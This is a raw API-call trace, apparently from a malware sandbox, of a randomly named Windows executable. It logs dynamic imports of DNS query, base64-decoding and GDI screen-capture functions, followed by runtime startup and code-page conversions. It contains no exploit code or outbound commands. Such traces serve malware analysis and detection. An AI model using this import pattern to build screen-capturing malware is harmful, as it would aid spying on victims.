lpProcName=0xc) returned 0x7723b131 [0070.289] GetProcAddress (hModule=0x77230000, lpProcName=0xb) returned 0x7723311b [0070.289] GetProcAddress (hModule=0x77230000, lpProcName=0x34) returned 0x77247673 [0070.289] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x755a0000 [0070.931] GetProcAddress (hModule=0x755a0000, lpProcName="DnsFree") returned 0x755a436b [0070.931] GetProcAddress (hModule=0x755a0000, lpProcName="DnsQuery_W") returned 0x755b572c [0070.931] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x77550000 [0070.931] GetProcAddress (hModule=0x77550000, lpProcName="CryptStringToBinaryA") returned 0x77585d77 [0070.932] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0070.932] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0070.932] GetProcAddress (hModule=0x770a0000, lpProcName="GetObjectA") returned 0x770b85d4 [0070.932] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0070.932] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0070.932] GetProcAddress (hModule=0x770a0000, lpProcName="GetBitmapBits") returned 0x770bc155 [0070.932] GetProcAddress (hModule=0x770a0000, lpProcName="BitBlt") returned 0x770b5ea6 [0070.932] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0070.933] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDCA") returned 0x770b7bcc [0070.933] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0070.933] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0070.933] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754e0000 [0071.518] GetProcAddress (hModule=0x754e0000, lpProcName="atexit") returned 0x754fc544 [0071.519] atexit (param_1=0x1de0920) returned 0 [0071.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18e7cc | out: lpSystemTimeAsFileTime=0x18e7cc*(dwLowDateTime=0x132d4e80, dwHighDateTime=0x1d5fd35)) [0071.528] GetCurrentThreadId () returned 0xb08 [0071.528] GetCurrentProcessId () returned 0xb00 [0071.528] QueryPerformanceCounter (in: lpPerformanceCount=0x18e7c4 | out: lpPerformanceCount=0x18e7c4*=19181071032) returned 1 [0071.605] GetStartupInfoW (in: lpStartupInfo=0x18e75c | out: lpStartupInfo=0x18e75c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76d43519, hStdOutput=0x77c5fd35, hStdError=0x77cc7daf)) [0071.624] GetProcessHeap () returned 0x750000 [0071.744] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0071.744] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0071.744] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0071.745] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0071.745] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0071.745] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0071.745] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0071.745] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0071.745] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0071.745] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0071.745] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0071.746] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0071.746] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0071.746] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0071.746] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0071.746] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0071.746] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0071.746] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0071.746] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0071.747] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0071.747] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0071.747] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0071.747] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0071.747] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0071.747] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0071.747] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0071.748] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0071.748] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0071.748] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0071.748] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0071.748] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0071.748] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0071.748] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0071.749] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0071.749] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x3bc) returned 0x76f1c8 [0071.749] GetCurrentThreadId () returned 0xb08 [0071.759] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x18) returned 0x7607f0 [0071.759] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x800) returned 0x76f590 [0071.759] GetStartupInfoW (in: lpStartupInfo=0x18e72c | out: lpStartupInfo=0x18e72c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0x65bf5945, hStdError=0x58)) [0071.759] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0071.759] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0071.759] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0071.759] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe\" " [0071.759] GetEnvironmentStringsW () returned 0x76fd98* [0071.802] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xaca) returned 0x770870 [0071.809] FreeEnvironmentStringsW (penv=0x76fd98) returned 1 [0071.817] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h1rxxmjek7fnkhtt.exe")) returned 0x3a [0071.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7e) returned 0x76fd98 [0071.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x98) returned 0x76fe20 [0071.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x3e) returned 0x764e80 [0071.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x6c) returned 0x76fec0 [0071.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x6e) returned 0x76ff38 [0071.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x78) returned 0x762d18 [0071.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x62) returned 0x76ffb0 [0071.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x2e) returned 0x76aef8 [0071.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x48) returned 0x766a78 [0071.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x28) returned 0x76a8b8 [0071.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x1a) returned 0x76ef80 [0071.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x4a) returned 0x770020 [0071.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x72) returned 0x762d98 [0071.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x30) returned 0x76af30 [0071.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x2e) returned 0x76af68 [0071.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x1c) returned 0x76efa8 [0071.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xd2) returned 0x770078 [0071.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x7c) returned 0x770158 [0071.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x36) returned 0x7701e0 [0071.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x3a) returned 0x764ec8 [0071.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x90) returned 0x770220 [0071.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x24) returned 0x76a8e8 [0071.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x30) returned 0x76afa0 [0071.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x36) returned 0x7702b8 [0071.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x48) returned 0x766ac8 [0071.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x52) returned 0x7702f8 [0071.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x3c) returned 0x764f10 [0071.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x82) returned 0x770358 [0071.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x2e) returned 0x76afd8 [0071.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x1e) returned 0x76efd0 [0071.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x2c) returned 0x76b010 [0071.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x54) returned 0x7703e8 [0071.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x52) returned 0x770448 [0071.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x2a) returned 0x76b048 [0071.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x3c) returned 0x764f58 [0071.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x54) returned 0x7704a8 [0071.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x24) returned 0x76a918 [0071.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x30) returned 0x76b080 [0071.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x8c) returned 0x770508 [0071.818] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x770870 | out: hHeap=0x750000) returned 1 [0071.932] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x800) returned 0x7705a0 [0071.938] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x80) returned 0x770da8 [0071.983] GetLastError () returned 0x0 [0071.983] SetLastError (dwErrCode=0x0) [0071.983] GetLastError () returned 0x0 [0071.983] SetLastError (dwErrCode=0x0) [0071.983] GetLastError () returned 0x0 [0071.983] SetLastError (dwErrCode=0x0) [0071.983] GetACP () returned 0x4e4 [0071.983] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x220) returned 0x770e30 [0071.984] GetLastError () returned 0x0 [0071.984] SetLastError (dwErrCode=0x0) [0071.984] IsValidCodePage (CodePage=0x4e4) returned 1 [0071.984] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18e720 | out: lpCPInfo=0x18e720) returned 1 [0071.995] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18e1e8 | out: lpCPInfo=0x18e1e8) returned 1 [0072.002] GetLastError () returned 0x0 [0072.002] SetLastError (dwErrCode=0x0) [0072.002] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e5fc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0072.011] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e5fc, cbMultiByte=256, lpWideCharStr=0x18df68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㹺CĀ") returned 256 [0072.011] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㹺CĀ", cchSrc=256, lpCharType=0x18e1fc | out: lpCharType=0x18e1fc) returned 1 [0072.011] GetLastError () returned 0x0 [0072.011] SetLastError (dwErrCode=0x0) [0072.011] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e5fc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0072.011] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e5fc, cbMultiByte=256, lpWideCharStr=0x18df38, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꥊBĀ") returned 256 [0072.021] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꥊBĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0072.021] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꥊBĀ", cchSrc=256, lpDestStr=0x18dd28, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0072.021] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18e4fc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÕY¿e8ç\x18", lpUsedDefaultChar=0x0) returned 256 [0072.021] GetLastError () returned 0x0 [0072.021] SetLastError (dwErrCode=0x0) [0072.021] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e5fc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0072.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e5fc, cbMultiByte=256, lpWideCharStr=0x18df58, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0072.022] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0072.022] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18dd48, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0072.022] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18e3fc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 